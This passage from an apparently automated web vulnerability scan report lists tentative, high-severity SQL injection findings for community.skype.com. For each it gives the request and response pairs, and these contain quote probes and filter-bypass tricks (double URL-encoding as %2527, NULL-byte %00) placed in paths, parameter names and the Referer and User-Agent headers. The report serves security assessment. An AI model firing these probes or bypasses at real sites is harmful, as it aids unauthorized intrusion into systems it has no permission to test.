User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:47:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Location: https://secure.skype.com/login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&redirectreason=notregistered&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2Fnotifications%2Fnotifymoderatorpage%2Fmessage-uid%2F25246%3F1%2500%2527%2527%3D1
Content-Length: 0
Connection: close
Content-Type: text/plain


1.37. http://community.skype.com/t5/tag/Mac/tg-p/category-id/English [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Mac/tg-p/category-id/English

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 129995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Mac" i
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag%2527%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.38. http://community.skype.com/t5/tag/Subscription/tg-p/category-id/English [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Subscription/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 132955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Subscr
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/Video/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/Video/tg-p/category-id/English?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/Video/tg-p/category-id/English?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "Video"
...[SNIP]...

1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/call/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/call/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/call/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "call"
...[SNIP]...

1.41. http://community.skype.com/t5/tag/crash/tg-p/category-id/English [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/crash/tg-p/category-id/English

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/tag/crash/tg-p/category-id/English%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 35824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Node 0 was N
...[SNIP]...
<link href="http://community.skype.com/t5/errors/errorpage/tag-name/crash/tag-id/32/category-id/English%27" rel="canonical">
...[SNIP]...
<div class="exception-page-message NoSuchNodeException lia-component-content" class="exception-page-message NoSuchNodeException">
...[SNIP]...

Request 2

GET /t5/tag/crash/tg-p/category-id/English%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/error/tg-p/category-id/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/tag/error/tg-p/category-id/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/error/tg-p/category-id/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 131344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "error"
...[SNIP]...

1.43. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/tag/spanish/tg-p/category-id/English

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Tag: "spanis
...[SNIP]...

1.44. http://community.skype.com/t5/user/viewprofilepage/user-id/165954 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165954

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 45036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="h
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.45. http://community.skype.com/t5/user/viewprofilepage/user-id/165958 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/165958

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/user/viewprofilepage'/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user/viewprofilepage''/user-id/165958 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.46. http://community.skype.com/t5/user/viewprofilepage/user-id/59914 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/59914

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/59914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.47. http://community.skype.com/t5/user/viewprofilepage/user-id/8 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/user/viewprofilepage/user-id/8

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/user%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:46:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...
<link href="http://community.skype.com/t5/errors/error404page" rel="canonical">
...[SNIP]...

Request 2

GET /t5/user%2527%2527/viewprofilepage/user-id/8 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:36 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

